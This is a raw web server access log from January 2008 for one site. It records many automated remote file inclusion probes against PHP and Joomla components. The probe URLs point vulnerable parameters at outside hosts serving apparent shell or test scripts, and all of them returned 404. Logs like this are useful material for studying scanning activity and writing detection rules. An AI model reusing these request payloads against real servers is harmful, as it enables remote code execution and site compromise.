150.161.5.91 - - [25/Jan/2008:05:05:26 -0800] "GET /logs/access.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:05:27 -0800] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:05:27 -0800] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:05:07:22 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:05:07:23 -0800] "GET //login.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:05:07:23 -0800] "GET /logs//login.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:05:07:33 -0800] "GET /logs/access_071219.log/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:05:08:07 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:08:07 -0800] "GET /logs/access_071220.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:05:08:07 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:08:08 -0800] "GET /logs/access_071216.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:08:08 -0800] "GET /logs/access_071228.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [25/Jan/2008:05:08:13 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:08:39 -0800] "GET /logs/access_071221.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:05:08:58 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:05:08:59 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:05:08:59 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:09:22 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.197.201.37 - - [25/Jan/2008:05:09:45 -0800] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.197.201.37 - - [25/Jan/2008:05:09:45 -0800] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.104.34.34 - - [25/Jan/2008:05:10:39 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:05:10:54 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:05:10:54 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:10:54 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.246.215 - - [25/Jan/2008:05:10:54 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.corriendo.net/libro_visitas/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:10:54 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.246.215 - - [25/Jan/2008:05:10:54 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.corriendo.net/libro_visitas/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.160.246.215 - - [25/Jan/2008:05:10:54 -0800] "GET //phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.corriendo.net/libro_visitas/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:05:10:54 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:05:10:54 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:10:54 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:10:54 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:10:54 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:10:55 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:11:40 -0800] "GET /logs/access_071212.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:05:12:31 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:05:12:31 -0800] "GET /index.php?redir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:05:12:32 -0800] "GET /logs/index.php?redir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:05:12:36 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:05:12:36 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:05:12:36 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:05:14:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:05:14:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:05:14:38 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:05:14:39 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:05:14:44 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:05:14:44 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:05:14:44 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:05:14:44 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:05:14:46 -0800] "GET /logs/access_080106.log/index.php?redir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:15:06 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:15:06 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:15:06 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.103.8.225 - - [25/Jan/2008:05:15:38 -0800] "GET /index.php?redir=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.172.34.73 - - [25/Jan/2008:05:15:42 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:15:52 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:15:52 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:15:52 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:16:22 -0800] "GET /logs/access_071116.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:05:16:42 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:05:16:42 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:05:16:42 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:05:16:42 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:05:17:13 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:05:17:13 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:05:17:13 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:05:17:13 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:17:38 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jan/2008:05:17:38 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:05:17:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:05:17:38 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
150.161.5.91 - - [25/Jan/2008:05:17:39 -0800] "GET /logs/access_071218.log//admin/editor2/spaw_control.class.php?spaw_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:05:17:48 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:05:17:48 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:17:49 -0800] "GET /logs/access_071214.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:18:38 -0800] "GET //login.php?dir=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.80.193.43 - - [25/Jan/2008:05:18:44 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312467)" "www.dmulk.com"
203.194.134.166 - - [25/Jan/2008:05:23:54 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.197.194.245 - - [25/Jan/2008:05:25:03 -0800] "GET //login.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:05:25:04 -0800] "GET /logs/access_071225.log/index.php?from_market=Y&pageurl=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:05:25:05 -0800] "GET /index.php?from_market=Y&pageurl=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:05:25:07 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:05:25:07 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:05:25:08 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:05:25:08 -0800] "GET /logs/index.php?from_market=Y&pageurl=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:05:25:34 -0800] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:05:25:35 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [25/Jan/2008:05:25:36 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.11.144.89 - - [25/Jan/2008:05:25:59 -0800] "GET /logs/modifyform.html?code=http://www.geocities.com/paddy.only/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.11.144.89 - - [25/Jan/2008:05:25:59 -0800] "GET /modifyform.html?code=http://www.geocities.com/paddy.only/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [25/Jan/2008:05:26:11 -0800] "GET //login.php?dir=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:27:33 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:27:33 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.137.168 - - [25/Jan/2008:05:27:34 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:05:29:11 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.26.216.70 - - [25/Jan/2008:05:29:12 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:05:30:19 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:05:30:19 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.154 - - [25/Jan/2008:05:30:23 -0800] "GET /logs/access_071230.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.248.98 - - [25/Jan/2008:05:30:54 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hideouttheatre.com/cache/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.248.98 - - [25/Jan/2008:05:30:55 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hideouttheatre.com/cache/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.248.98 - - [25/Jan/2008:05:31:01 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hideouttheatre.com/cache/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
